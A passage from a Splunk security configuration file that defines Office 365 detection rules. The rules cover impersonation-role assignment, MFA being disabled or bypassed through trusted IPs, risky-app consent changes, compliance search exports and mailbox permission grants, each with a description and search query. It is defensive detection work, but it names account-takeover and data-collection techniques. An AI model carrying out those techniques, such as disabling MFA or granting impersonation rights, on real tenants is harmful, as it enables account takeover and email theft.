action.notable.param.rule_description = The following analytic identifies the assignment of the ApplicationImpersonation role in Office 365, either to a user or an application. This analytic leverages the Office 365 Management Activity API, specifically monitoring for events related to role assignments and changes within the Azure Active Directory audit logs. The ApplicationImpersonation role allows a security principal to impersonate any user within the organization and perform actions on their behalf, such as accessing or modifying their mailbox. This role, if misused or granted inappropriately, can pose a significant security risk. Monitoring the assignment of this role is crucial as it can be an indicator of potential malicious activity or misconfigurations. If an attacker successfully assigns the ApplicationImpersonation role to a malicious user or application, they can gain the ability to impersonate any user within the organization. This can lead to unauthorized access to sensitive information, manipulation of mailbox data, and other malicious actions. The attacker can effectively masquerade as a legitimate user, making their actions harder to detect and potentially causing significant harm to the organization.
action.notable.param.rule_title = O365 ApplicationImpersonation Role Assigned
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=Exchange Operation="New-ManagementRoleAssignment" Role=ApplicationImpersonation | rename User as target_user | stats max(_time) as lastTime by Operation, user, object, ObjectId, Role, target_user | `security_content_ctime(lastTime)` | `o365_applicationimpersonation_role_assigned_filter`

[ESCU - O365 Block User Consent For Risky Apps Disabled - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic detects when the "risk-based step-up consent" security setting in Microsoft 365 is disabled. This setting, when enabled, prevents regular users from granting consent to potentially malicious OAuth applications, requiring an administrative "step-up" for consent instead. Disabling this feature could expose the organization to OAuth phishing threats. The detection operates by monitoring Azure Active Directory logs for events where the "Update authorization policy" operation is performed. It specifically looks for changes to the "AllowUserConsentForRiskyApps" setting, identifying instances where this setting is switched to "true," effectively disabling the risk-based step-up consent. Monitoring for changes to critical security settings like the "risk-based step-up consent" is vital for maintaining the integrity of an organization's security posture. Disabling this feature can make the environment more susceptible to OAuth phishing attacks, where attackers trick users into granting permissions to malicious applications. Identifying when this setting is disabled can help blue teams to quickly respond, investigate, and potentially uncover targeted phishing campaigns against their users. If an attacker successfully disables the "risk-based step-up consent" and subsequently launches an OAuth phishing campaign, they could gain unauthorized access to user data and other sensitive information within the M365 environment. This could lead to data breaches, unauthorized access to emails, and potentially further compromise within the organization.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562"], "nist": ["DE.CM"]}
action.escu.data_models = ["Risk"]
action.escu.eli5 = This analytic detects when the "risk-based step-up consent" security setting in Microsoft 365 is disabled. This setting, when enabled, prevents regular users from granting consent to potentially malicious OAuth applications, requiring an administrative "step-up" for consent instead. Disabling this feature could expose the organization to OAuth phishing threats. The detection operates by monitoring Azure Active Directory logs for events where the "Update authorization policy" operation is performed. It specifically looks for changes to the "AllowUserConsentForRiskyApps" setting, identifying instances where this setting is switched to "true," effectively disabling the risk-based step-up consent. Monitoring for changes to critical security settings like the "risk-based step-up consent" is vital for maintaining the integrity of an organization's security posture. Disabling this feature can make the environment more susceptible to OAuth phishing attacks, where attackers trick users into granting permissions to malicious applications. Identifying when this setting is disabled can help blue teams to quickly respond, investigate, and potentially uncover targeted phishing campaigns against their users. If an attacker successfully disables the "risk-based step-up consent" and subsequently launches an OAuth phishing campaign, they could gain unauthorized access to user data and other sensitive information within the M365 environment. This could lead to data breaches, unauthorized access to emails, and potentially further compromise within the organization.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = Legitimate changes to the 'risk-based step-up consent' setting by administrators, perhaps as part of a policy update or security assessment, may trigger this alert, necessitating verification of the change's intent and authorization.
action.escu.creation_date = 2023-10-26
action.escu.modification_date = 2023-10-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Block User Consent For Risky Apps Disabled - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Account Takeover"]
action.risk = 1
action.risk.param._risk_message = Risk-based step-up consent security setting was disabled by $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 30}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Block User Consent For Risky Apps Disabled - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects when the "risk-based step-up consent" security setting in Microsoft 365 is disabled. This setting, when enabled, prevents regular users from granting consent to potentially malicious OAuth applications, requiring an administrative "step-up" for consent instead. Disabling this feature could expose the organization to OAuth phishing threats.The detection operates by monitoring Azure Active Directory logs for events where the "Update authorization policy" operation is performed. It specifically looks for changes to the "AllowUserConsentForRiskyApps" setting, identifying instances where this setting is switched to "true," effectively disabling the risk-based step-up consent. Monitoring for changes to critical security settings like the "risk-based step-up consent" is vital for maintaining the integrity of an organization's security posture. Disabling this feature can make the environment more susceptible to OAuth phishing attacks, where attackers trick users into granting permissions to malicious applications. Identifying when this setting is disabled can help blue teams to quickly respond, investigate, and potentially uncover targeted phishing campaigns against their users. If an attacker successfully disables the "risk-based step-up consent" and subsequently launches an OAuth phishing campaign, they could gain unauthorized access to user data and other sensitive information within the M365 environment. This could lead to data breaches, unauthorized access to emails, and potentially further compromise within the organization. 
action.notable.param.rule_title = O365 Block User Consent For Risky Apps Disabled action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation="Update authorization policy." | eval index_number = if(mvfind('ModifiedProperties{}.Name', "AllowUserConsentForRiskyApps") >= 0, mvfind('ModifiedProperties{}.Name', "AllowUserConsentForRiskyApps"), -1) | search index_number >= 0 | eval AllowUserConsentForRiskyApps = mvindex('ModifiedProperties{}.NewValue',index_number) | where AllowUserConsentForRiskyApps like "%true%" | stats count min(_time) as firstTime max(_time) as lastTime by user, Operation, AllowUserConsentForRiskyApps, user_agent | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_block_user_consent_for_risky_apps_disabled_filter` [ESCU - O365 Bypass MFA via Trusted IP - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies instances where new IP addresses are added to the trusted IPs list in Office 365, potentially allowing users from these IPs to bypass Multi-Factor Authentication (MFA) during login. The detection leverages O365 audit logs, specifically focusing on events related to the modification of trusted IP settings. By monitoring these logs, the analytic captures and alerts on any addition of new trusted IPs. Adding trusted IPs to bypass MFA is a significant security concern. While there might be legitimate reasons to add trusted IPs, such as for a new office location, there's also a risk of attackers or malicious insiders using this to facilitate unauthorized access. Monitoring for changes to the trusted IP list helps ensure that any attempt to bypass MFA is legitimate and authorized. 
If the detection is a true positive, it suggests that users logging in from the newly added trusted IP can bypass MFA, potentially weakening the security posture of the organization. This could lead to unauthorized access, especially if the IP was added maliciously. Immediate investigation is required to validate the legitimacy of the IP addition and to assess potential security implications. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This analytic identifies instances where new IP addresses are added to the trusted IPs list in Office 365, potentially allowing users from these IPs to bypass Multi-Factor Authentication (MFA) during login. The detection leverages O365 audit logs, specifically focusing on events related to the modification of trusted IP settings. By monitoring these logs, the analytic captures and alerts on any addition of new trusted IPs. Adding trusted IPs to bypass MFA is a significant security concern. While there might be legitimate reasons to add trusted IPs, such as for a new office location, there's also a risk of attackers or malicious insiders using this to facilitate unauthorized access. Monitoring for changes to the trusted IP list helps ensure that any attempt to bypass MFA is legitimate and authorized. If the detection is a true positive, it suggests that users logging in from the newly added trusted IP can bypass MFA, potentially weakening the security posture of the organization. This could lead to unauthorized access, especially if the IP was added maliciously. Immediate investigation is required to validate the legitimacy of the IP addition and to assess potential security implications. action.escu.how_to_implement = You must install Splunk Microsoft Office 365 add-on. 
This search works with o365:management:activity action.escu.known_false_positives = Unless it is a special case, it is uncommon to continually update Trusted IPs to MFA configuration. action.escu.creation_date = 2022-02-03 action.escu.modification_date = 2022-02-03 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Bypass MFA via Trusted IP - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Persistence Mechanisms"] action.risk = 1 action.risk.param._risk_message = User $user_id$ has added new IP addresses $ip_addresses_new_added$ to a list of trusted IPs to bypass MFA action.risk.param._risk = [{"threat_object_field": "ip_addresses_new_added", "threat_object_type": "ip_address"}, {"risk_object_field": "user_id", "risk_object_type": "other", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Bypass MFA via Trusted IP - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies instances where new IP addresses are added to the trusted IPs list in Office 365, potentially allowing users from these IPs to bypass Multi-Factor Authentication (MFA) during login. The detection leverages O365 audit logs, specifically focusing on events related to the modification of trusted IP settings. 
By monitoring these logs, the analytic captures and alerts on any addition of new trusted IPs. Adding trusted IPs to bypass MFA is a significant security concern. While there might be legitimate reasons to add trusted IPs, such as for a new office location, there's also a risk of attackers or malicious insiders using this to facilitate unauthorized access. Monitoring for changes to the trusted IP list helps ensure that any attempt to bypass MFA is legitimate and authorized. If the detection is a true positive, it suggests that users logging in from the newly added trusted IP can bypass MFA, potentially weakening the security posture of the organization. This could lead to unauthorized access, especially if the IP was added maliciously. Immediate investigation is required to validate the legitimacy of the IP addition and to assess potential security implications. action.notable.param.rule_title = O365 Bypass MFA via Trusted IP action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Operation="Set Company Information." 
ModifiedProperties{}.Name=StrongAuthenticationPolicy | rex max_match=100 field=ModifiedProperties{}.NewValue "(?\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\/\d{1,2})" | rex max_match=100 field=ModifiedProperties{}.OldValue "(?\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\/\d{1,2})" | eval ip_addresses_old=if(isnotnull(ip_addresses_old),ip_addresses_old,"0") | mvexpand ip_addresses_new_added | where isnull(mvfind(ip_addresses_old,ip_addresses_new_added)) |stats count min(_time) as firstTime max(_time) as lastTime values(ip_addresses_old) as ip_addresses_old by user ip_addresses_new_added Operation Workload vendor_account status user_id action | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `o365_bypass_mfa_via_trusted_ip_filter` [ESCU - O365 Compliance Content Search Exported - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection targets activities where the results of a content search within the Office 365 Security and Compliance Center are exported, a crucial phase in the compliance and investigative workflows. By focusing on the SearchExported operation logged under the SecurityComplianceCenter workload in the o365_management_activity, this analytic flags instances that potentially move sensitive or critical organizational data outside its original storage locations. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection targets activities where the results of a content search within the Office 365 Security and Compliance Center are exported, a crucial phase in the compliance and investigative workflows. By focusing on the SearchExported operation logged under the SecurityComplianceCenter workload in the o365_management_activity, this analytic flags instances that potentially move sensitive or critical organizational data outside its original storage locations. 
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Compliance content searche exports may be executed for legitimate purposes, filter as needed. action.escu.creation_date = 2024-04-01 action.escu.modification_date = 2024-04-01 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Compliance Content Search Exported - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = A new compliance content search export was started by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Compliance Content Search Exported - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection targets activities where the results of a content search within the Office 365 Security and Compliance Center are exported, a crucial phase in the compliance and investigative workflows. 
By focusing on the SearchExported operation logged under the SecurityComplianceCenter workload in the o365_management_activity, this analytic flags instances that potentially move sensitive or critical organizational data outside its original storage locations. action.notable.param.rule_title = O365 Compliance Content Search Exported action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=SecurityComplianceCenter Operation="SearchExported" | rename user_id as user | stats count earliest(_time) as firstTime latest(_time) as lastTime by Operation, ObjectId, ExchangeLocations, user, Query |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_compliance_content_search_exported_filter` [ESCU - O365 Compliance Content Search Started - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection will trigger when a content search is initiated within the Office 365 Security and Compliance Center, a critical component in the suite's governance, risk management, and compliance (GRC) capabilities. By monitoring the SearchCreated operation within the o365_management_activity logs, specifically under the SecurityComplianceCenter workload, this analytic flags the commencement of searches across the organization's data, including emails, documents, and more, that reside in ExchangeLocations. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection will trigger when a content search is initiated within the Office 365 Security and Compliance Center, a critical component in the suite's governance, risk management, and compliance (GRC) capabilities. 
By monitoring the SearchCreated operation within the o365_management_activity logs, specifically under the SecurityComplianceCenter workload, this analytic flags the commencement of searches across the organization's data, including emails, documents, and more, that reside in ExchangeLocations. action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events. action.escu.known_false_positives = Compliance content searches may be executed for legitimate purposes, filter as needed. action.escu.creation_date = 2024-04-01 action.escu.modification_date = 2024-04-01 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Compliance Content Search Started - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Collection Techniques"] action.risk = 1 action.risk.param._risk_message = A new compliance content search was started by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Compliance Content Search Started - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1114", "T1114.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection will trigger when a content search is initiated within the Office 365 Security and Compliance Center, a critical component 
in the suite's governance, risk management, and compliance (GRC) capabilities. By monitoring the SearchCreated operation within the o365_management_activity logs, specifically under the SecurityComplianceCenter workload, this analytic flags the commencement of searches across the organization's data, including emails, documents, and more, that reside in ExchangeLocations. action.notable.param.rule_title = O365 Compliance Content Search Started action.notable.param.security_domain = audit action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=SecurityComplianceCenter Operation=SearchCreated | rename user_id as user | stats count earliest(_time) as firstTime latest(_time) as lastTime by Operation, ObjectId, ExchangeLocations, user, Query |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `o365_compliance_content_search_started_filter` [ESCU - O365 Concurrent Sessions From Different Ips - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identies scenarios where the same user session is accessed from multiple IP addresses. This situation typically arises in an adversary-in-the-middle (AiTM) phishing attack, where attackers compromise user sessions. The detection method involves analyzing Azure Active Directory logs for 'UserLoggedIn' operations. It focuses on identifying sessions where the number of associated IP addresses exceeds one for the same SessionId. This pattern suggests potential unauthorized concurrent access, which is atypical under normal usage scenarios. If a true positive is identified, it implies that an adversary has gained unauthorized access to a user's Office 365 account. 
The ramifications of this can be significant, including data theft, account takeover, and launching of internal phishing campaigns. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identies scenarios where the same user session is accessed from multiple IP addresses. This situation typically arises in an adversary-in-the-middle (AiTM) phishing attack, where attackers compromise user sessions. The detection method involves analyzing Azure Active Directory logs for 'UserLoggedIn' operations. It focuses on identifying sessions where the number of associated IP addresses exceeds one for the same SessionId. This pattern suggests potential unauthorized concurrent access, which is atypical under normal usage scenarios. If a true positive is identified, it implies that an adversary has gained unauthorized access to a user's Office 365 account. The ramifications of this can be significant, including data theft, account takeover, and launching of internal phishing campaigns. action.escu.how_to_implement = You must install splunk Microsoft Office 365 add-on. 
This search works with o365:management:activity action.escu.known_false_positives = Unknown action.escu.creation_date = 2023-12-04 action.escu.modification_date = 2023-12-04 action.escu.confidence = high action.escu.full_search_name = ESCU - O365 Concurrent Sessions From Different Ips - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Office 365"] action.escu.analytic_story = ["Office 365 Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ has logged in with the same session id from more than one unique IP address action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 42}, {"threat_object_field": "ips", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - O365 Concurrent Sessions From Different Ips - Rule action.correlationsearch.annotations = {"analytic_story": ["Office 365 Account Takeover"], "cis20": ["CIS 10"], "confidence": 60, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1185"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identies scenarios where the same user session is accessed from multiple IP addresses. This situation typically arises in an adversary-in-the-middle (AiTM) phishing attack, where attackers compromise user sessions. The detection method involves analyzing Azure Active Directory logs for 'UserLoggedIn' operations. It focuses on identifying sessions where the number of associated IP addresses exceeds one for the same SessionId. 
This pattern suggests potential unauthorized concurrent access, which is atypical under normal usage scenarios. If a true positive is identified, it implies that an adversary has gained unauthorized access to a user's Office 365 account. The ramifications of this can be significant, including data theft, account takeover, and launching of internal phishing campaigns. action.notable.param.rule_title = O365 Concurrent Sessions From Different Ips action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `o365_management_activity` Workload=AzureActiveDirectory Operation=UserLoggedIn | stats min(_time) as firstTime max(_time) as lastTime values(src_ip) as ips values(user_agent) as user_agents by Operation, user, SessionId | where mvcount(ips) > 1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_concurrent_sessions_from_different_ips_filter` [ESCU - O365 Disable MFA - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies instances where Multi-Factor Authentication (MFA) is disabled for a user within the Office 365 environment. Disabling MFA removes a critical security layer, making accounts more vulnerable to unauthorized access. The detection leverages O365 audit logs, specifically focusing on events related to MFA settings. By monitoring these logs, the analytic captures and alerts on any actions that result in the deactivation or disabling of MFA for a user. MFA is a cornerstone of modern security practices, providing an additional layer of protection beyond just a password. Disabling MFA, especially without a valid reason, poses a significant security risk. Attackers, after gaining initial access to an account, might disable MFA to ensure easier re-entry and persistence. 
Monitoring for such changes is crucial to detect potential security breaches and to ensure that security best practices are consistently applied. If the detection is a true positive, it indicates that a user's account is now at increased risk of unauthorized access, as the added security layer of MFA has been removed. This could be a sign of an attacker trying to maintain persistence or an insider threat. Immediate investigation is required to validate the reason for disabling MFA, potentially re-enable it, and assess any other suspicious activities related to the affected account. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This analytic identifies instances where Multi-Factor Authentication (MFA) is disabled for a user within the Office 365 environment. Disabling MFA removes a critical security layer, making accounts more vulnerable to unauthorized access. The detection leverages O365 audit logs, specifically focusing on events related to MFA settings. By monitoring these logs, the analytic captures and alerts on any actions that result in the deactivation or disabling of MFA for a user. MFA is a cornerstone of modern security practices, providing an additional layer of protection beyond just a password. Disabling MFA, especially without a valid reason, poses a significant security risk. Attackers, after gaining initial access to an account, might disable MFA to ensure easier re-entry and persistence. Monitoring for such changes is crucial to detect potential security breaches and to ensure that security best practices are consistently applied. If the detection is a true positive, it indicates that a user's account is now at increased risk of unauthorized access, as the added security layer of MFA has been removed. 
This could be a sign of an attacker trying to maintain persistence or an insider threat. Immediate investigation is required to validate the reason for disabling MFA, potentially re-enable it, and assess any other suspicious activities related to the affected account.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 add-on. This search works with o365:management:activity
action.escu.known_false_positives = Unless it is a special case, it is uncommon to disable MFA or Strong Authentication
action.escu.creation_date = 2022-02-03
action.escu.modification_date = 2022-02-03
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Disable MFA - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Persistence Mechanisms"]
action.risk = 1
action.risk.param._risk_message = User $src_user$ has executed an operation $action$ for user $user$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Disable MFA - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Persistence Mechanisms"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies instances where Multi-Factor Authentication (MFA) is disabled for a user within the Office 365 environment. Disabling MFA removes a critical security layer, making accounts more vulnerable to unauthorized access. The detection leverages O365 audit logs, specifically focusing on events related to MFA settings. By monitoring these logs, the analytic captures and alerts on any actions that result in the deactivation or disabling of MFA for a user. MFA is a cornerstone of modern security practices, providing an additional layer of protection beyond just a password. Disabling MFA, especially without a valid reason, poses a significant security risk. Attackers, after gaining initial access to an account, might disable MFA to ensure easier re-entry and persistence. Monitoring for such changes is crucial to detect potential security breaches and to ensure that security best practices are consistently applied. If the detection is a true positive, it indicates that a user's account is now at increased risk of unauthorized access, as the added security layer of MFA has been removed. This could be a sign of an attacker trying to maintain persistence or an insider threat. Immediate investigation is required to validate the reason for disabling MFA, potentially re-enable it, and assess any other suspicious activities related to the affected account.
action.notable.param.rule_title = O365 Disable MFA
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Operation="Disable Strong Authentication." | stats count earliest(_time) as firstTime latest(_time) as lastTime by UserType Operation UserId ResultStatus object | rename UserType AS user_type, Operation AS action, UserId AS src_user, object AS user, ResultStatus AS result | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_disable_mfa_filter`

[ESCU - O365 Elevated Mailbox Permission Assigned - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection triggers on the assignment of elevated mailbox permissions within an Office 365 environment, specifically through the Add-MailboxPermission operation, as logged under the Exchange workload in the o365_management_activity. It is meticulously designed to spotlight instances where critical permissions such as FullAccess, ChangePermission, or ChangeOwner are granted, marking significant alterations in mailbox access controls.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = This detection triggers on the assignment of elevated mailbox permissions within an Office 365 environment, specifically through the Add-MailboxPermission operation, as logged under the Exchange workload in the o365_management_activity. It is meticulously designed to spotlight instances where critical permissions such as FullAccess, ChangePermission, or ChangeOwner are granted, marking significant alterations in mailbox access controls.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 Add-on and ingest Office 365 management activity events.
action.escu.known_false_positives = FullAccess mailbox delegation may be assigned for legitimate purposes, filter as needed.
action.escu.creation_date = 2024-03-31
action.escu.modification_date = 2024-03-31
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Elevated Mailbox Permission Assigned - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Office 365"]
action.escu.analytic_story = ["Office 365 Collection Techniques"]
action.risk = 1
action.risk.param._risk_message = Elevated mailbox permissions were assigned on $dest_user$
action.risk.param._risk = [{"risk_object_field": "dest_user", "risk_object_type": "user", "risk_score": 42}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - O365 Elevated Mailbox Permission Assigned - Rule
action.correlationsearch.annotations = {"analytic_story": ["Office 365 Collection Techniques"], "cis20": ["CIS 10"], "confidence": 70, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This detection triggers on the assignment of elevated mailbox permissions within an Office 365 environment, specifically through the Add-MailboxPermission operation, as logged under the Exchange workload in the o365_management_activity. It is meticulously designed to spotlight instances where critical permissions such as FullAccess, ChangePermission, or ChangeOwner are granted, marking significant alterations in mailbox access controls.
action.notable.param.rule_title = O365 Elevated Mailbox Permission Assigned
action.notable.param.security_domain = audit
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `o365_management_activity` Workload=Exchange Operation=Add-MailboxPermission | search (AccessRights=FullAccess OR AccessRights=ChangePermission OR AccessRights=ChangeOwner) | rename Identity AS dest_user | stats count earliest(_time) as firstTime latest(_time) as lastTime by user dest_user Operation AccessRights | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `o365_elevated_mailbox_permission_assigned_filter`

[ESCU - O365 Excessive Authentication Failures Alert - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects when an excessive number of authentication failures occur. The search also includes attempts against MFA prompt codes.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.AE"]}
action.escu.data_models = ["Authentication"]
action.escu.eli5 = This search detects when an excessive number of authentication failures occur. The search also includes attempts against MFA prompt codes.
action.escu.how_to_implement = You must install the Splunk Microsoft Office 365 add-on. This search works with o365:management:activity
action.escu.known_false_positives = The alert threshold is above 10 attempts, which should reduce the number of false positives.
action.escu.creation_date = 2022-02-18
action.escu.modification_date = 2022-02-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - O365 Excessive Authentication Failures Alert - Rule
action.escu.search_type = detection
